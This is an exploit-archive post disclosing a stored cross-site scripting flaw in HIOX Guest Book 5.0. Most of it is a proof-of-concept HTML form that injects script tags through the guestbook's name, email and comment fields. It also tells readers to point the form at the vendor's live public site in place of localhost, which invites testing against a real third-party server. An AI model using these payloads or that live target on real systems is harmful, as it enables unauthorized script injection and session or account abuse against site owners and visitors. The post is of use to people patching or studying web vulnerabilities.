facebook facebook twitter rss

HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scriptin

Author: JoKeR_StEx , Published: 03-01-2014
#############################################################################

# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting

# Author : JoKeR_StEx

# Tested On : Windows

# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip

# Date : 03/01/2014

#############################################################################
[+] P.O.C

<form action="http://127.0.0.1/HGB/add.php" method="POST">
<!--In Name -->
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">
<!-- In Email -->
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">
<!-- in comment -->
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">
</form>

[+] For test The Exploit (Example)

ex:http://www.hscripts.com/scripts/php/HGB/add.php

Just Replace http://127.0.0.1/HGB/add.php by http://www.hscripts.com/scripts/php/HGB/add.php ^___^

################################################################################
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians
################################################################################
email : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx

Like us on Facebook :